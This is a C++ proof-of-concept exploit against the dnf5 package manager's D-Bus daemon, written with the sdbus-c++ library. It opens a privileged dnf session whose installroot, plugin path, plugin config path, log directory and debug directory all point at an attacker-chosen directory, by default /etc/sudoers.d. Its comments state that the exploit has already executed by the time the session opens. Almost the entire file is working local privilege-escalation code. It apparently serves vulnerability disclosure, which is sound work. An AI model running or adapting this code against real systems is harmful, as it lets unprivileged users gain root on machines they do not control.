#include <exception>
#include <iostream>
#include <map>
#include <string>

#include <sdbus-c++/sdbus-c++.h>

using KeyValMap     = std::map<std::string, std::string>;
using KeyVariantMap = std::map<std::string, sdbus::Variant>;

constexpr auto DBUS_NAME          = "org.rpm.dnf.v0";
constexpr auto DBUS_OBJECT_PATH   = "/org/rpm/dnf/v0";
constexpr auto SESSION_MANAGER_IF = "org.rpm.dnf.v0.SessionManager";
constexpr auto GOAL_IF            = "org.rpm.dnf.v0.Goal";
constexpr auto RPM_IF             = "org.rpm.dnf.v0.rpm.Rpm";

using TransactionItem = sdbus::Struct<
    std::string,   // libdnf5::transaction::TransactionItemType
    std::string,   // libdnf5::transaction::TransactionItemAction
    std::string,   // libdnf5::transaction::TransactionItemReason
    KeyVariantMap,   // other transaction item attributes - e.g. group id for REASON_CHANGE to GROUP,
                   // packages that are replaced by this transaction item
    KeyVariantMap>;  // transaction object (package / group / module)

void waitForInput() {
	std::cout << "\n\nPress Ctrl-D to finish" << std::endl;
	bool wait;
	std::cin >> wait;
}

void printTransactionProblems(sdbus::IProxy &proxy) {
	std::vector<std::string> problems;
	proxy.callMethod("get_transaction_problems_string")
		.onInterface(GOAL_IF)
		.storeResultsTo(problems);

	std::cout << "\n\n";
	for (const auto &problem: problems) {
		std::cout << ">>> " << problem << "\n";
	}
}

int call_dbus(const std::string_view exploit_dir) {
	auto connection = sdbus::createSystemBusConnection();
	connection->enterEventLoopAsync();
	auto dnf_proxy = sdbus::createProxy(*connection, DBUS_NAME, DBUS_OBJECT_PATH);
	dnf_proxy->finishRegistration();

	KeyVariantMap session_config;
	KeyValMap main_config;
	/*
	 * set a bunch of paths to the desired exploit directory.
	 * actually we only need installroot and plugin(conf)path.
	 */
	main_config["debugdir"] = exploit_dir;
	main_config["debugsolver"] = "true";
	main_config["logdir"] = exploit_dir;
	main_config["installroot"] = exploit_dir;
	main_config["pluginpath"] = exploit_dir;
	main_config["pluginconfpath"] = exploit_dir;

	// se the configuration dictionary
	session_config["config"] = main_config;

	sdbus::ObjectPath dnf_session_path;

	// this creates and configures a new session to work with libdnf5
	dnf_proxy->callMethod("open_session")
		.onInterface(SESSION_MANAGER_IF)
		.withArguments(session_config)
		.storeResultsTo(dnf_session_path);

	std::cout << "opened new dnf5 session " << dnf_session_path << std::endl;

	// at this point the exploit should already have been executed. the
	// rest of the code is just an example how one could continue from
	// here, creating a proxy for the new session, asking for an upgrade of
	// bash (for regular operation).

	auto session_proxy = sdbus::createProxy(*connection, DBUS_NAME, dnf_session_path);
	session_proxy->finishRegistration();

	try {
		session_proxy->callMethod("upgrade")
			.onInterface(RPM_IF)
			.withArguments(std::vector<std::string>{"bash"}, KeyVariantMap{})
			.storeResultsTo();
		std::cout << "requested rpm.install" << std::endl;
	} catch (const std::exception &ex) {
		std::cerr << "failed to call rpm.install: " << ex.what() << std::endl;
		return 1;
	}

	std::vector<TransactionItem> transactions;
	unsigned int result;

	try {
		session_proxy->callMethod("resolve")
			.onInterface(GOAL_IF)
			.withArguments(KeyVariantMap{})
			.storeResultsTo(transactions, result);
		std::cout << "resolve result: " << result << ", " <<
			transactions.size() << " transactions returned" << std::endl;

		if (result != 0) {
			printTransactionProblems(*session_proxy);
		}
	} catch (const std::exception &ex) {
		std::cerr << "failed to call goal.resolve: " << ex.what() << std::endl;
	}

	// uncomment this to keep the client session alive until an
	// EOF on stdin is seen.
	//waitForInput();

	return 0;
}

int main(const int argc, const char **argv) {
	const auto exploit_dir = argc > 1 ? argv[1] : "/etc/sudoers.d";

	std::cout << "Using exploit_dir " << exploit_dir << "\n";
	try {
		return call_dbus(exploit_dir);
	} catch (const std::exception &ex) {
		std::cerr << "unhandled exception: " << ex.what() << "\n";
		return 2;
	}

	return 0;
}
